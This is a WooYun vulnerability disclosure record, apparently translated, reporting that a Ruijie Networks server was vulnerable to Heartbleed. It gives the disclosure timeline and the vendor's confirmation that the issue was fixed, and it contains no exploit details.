Vulnerability Summary
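Bug ID: wooyun-2016-0179877
Title: A Ruijie Networks server is vulnerable to Heartbleed
Vendor: ruijie.com.cn
Author: 路人甲
Submitted: 2016-03-01 17:51
Fixed: 2016-03-04 09:58
Disclosed: 2016-03-04 09:58
Vulnerability type: System/service not patched in time
Severity: High
Self-assessed Rank: 10
Status: Fixed by vendor
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: None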
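Vulnerability Details
Disclosure status:
2016-03-01: Details reported to the vendor; awaiting vendor handling
2016-03-04: Vendor confirmed; details disclosed to the vendor only
2016-03-04: Vendor fixed the vulnerability and proactively disclosed it; details disclosed to the public
Brief description:
Improper operations and maintenance on a Ruijie site leaks sensitive server information; the server is vulnerable to Heartbleed
Detailed description:
Proof of vulnerability: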
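Remediation:
The patch should have been applied long ago
Copyright notice: please credit the source when reposting: 路人甲@乌云
Vendor Response
Vendor response:
Severity: Low
Vulnerability Rank: 3
Confirmed: 2016-03-04 09:57
Vendor reply:
Fixed
Latest status:
2016-03-04: Fixed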